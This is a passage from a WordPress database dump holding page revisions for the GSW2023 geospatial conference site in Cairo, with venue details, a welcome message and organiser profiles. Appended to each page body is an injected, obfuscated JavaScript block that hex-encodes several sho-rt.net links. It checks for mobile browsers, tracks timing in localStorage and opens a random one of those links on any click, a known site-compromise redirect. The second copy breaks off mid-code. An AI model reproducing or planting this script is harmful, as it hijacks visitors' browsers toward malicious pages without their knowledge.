!important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>INTERCONTINENTAL CAIRO SEMIRAMIS</strong></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>MORE INFORMATION</strong></h4>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Office of the Vice President of the Academy for Graduate Studies and Scientific Research</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 21:12:56','2022-11-09 21:12:56','',3066,'https://gsw2023.com/?p=3232',0,'revision','',0),
(3233,1,'2022-11-09 21:14:05','2022-11-09 21:14:05','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"0\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 0px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_column_text][video width=\"960\" height=\"540\" mp4=\"https://gsw2023.com/wp-content/uploads/2022/11/dr-ismael.mp4\"][/video][/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][/vc_row][vc_row css=\".vc_custom_1685790265719{margin-top: -75px !important;}\"][vc_column][vc_column_text]</p>\n<p style=\"text-align: justify; color: black;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology,and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States.</p>\n<p style=\"text-align: justify; color: black;\">AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. It is the primary factor for human achievements throughout all ages. The GSW will provide a platform for international scholars, graduate students, future scientists and industrial sectors to learn exchange knowledge and experiences of applying geospatial technologies for sustainable development for better quality of life for people around the world.</p>\n<p style=\"text-align: justify; color: black;\">We would like to take this opportunity to welcome you to Cairo a vibrant, exhilarating, exotic, fascinating and welcoming city. Home to the best Pharaonic, Coptic and Islamic sights in Egypt. Cairo is where you never know what incredible, Alf-forgotten monument you might stumble across while wandering around. Enjoy the Nile view, visit the great pyramids of Giza, walk through the capital\'s medieval markets by Khan El-Khalili, or walk down the Nile promenade. We look forward to working with the ISPRS council, commissions presidents, working group officers, and other sister organizations to have a successful technical program and a memorable social program. It is great to have the GSW coming to Egypt where most probably the first mapping systems were developed 1000s years ago. Welcome to GSW\'2023 in Cairo, Egypt.</p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/3\"][vc_column_text]</p>\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2270\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael.png\" alt=\"\" width=\"118\" height=\"117\" /></p>\n<p>&nbsp;</p>\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><strong>Prof. Ismail AbdelGhafar</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></p>\n</div>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_column_text]<img class=\"alignnone wp-image-4613 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/dr-alaa.jpg\" alt=\"\" width=\"94\" height=\"124\" /></p>\n<p>&nbsp;</p>\n<div class=\"aio-icon-header\">\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Prof. Dr. Alaa A. Abdelbary</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><span style=\"font-size: 10pt;\"><strong>Chairman of the local organizing committee GSW2023, Egypt</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 10pt;\"><strong>Vice President for Postgraduates Studies and Scientific Research</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 10pt;\"><strong>Arab Academy for Science, Technology&amp; Maritime Transport</strong></span></p>\n</div>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_column_text]<img class=\"alignnone wp-image-2272 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg\" alt=\"\" width=\"124\" height=\"124\" /></p>\n<p>&nbsp;</p>\n<div class=\"aio-icon-header\">\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\">Prof. Naser El-Sheimy</span></h4>\n</div>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>Geospatial Week Director ,The University of Calgary</strong></p>\n<p>&nbsp;</p>\n</div>\n</div>\n</div>\n<p>&nbsp;</p>\n</section>\n</div>\n</div>\n</div>\n</div>\n</div>\n<footer id=\"footer\" class=\"footer solid-bg footer-outline-decoration full-width empty-footer\">\n<div id=\"bottom-bar\" class=\"solid-bg logo-left\" role=\"contentinfo\">\n<div class=\"wf-wrap\">\n<div class=\"wf-container-bottom\"></div>\n</div>\n</div>\n</footer>\n</div>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 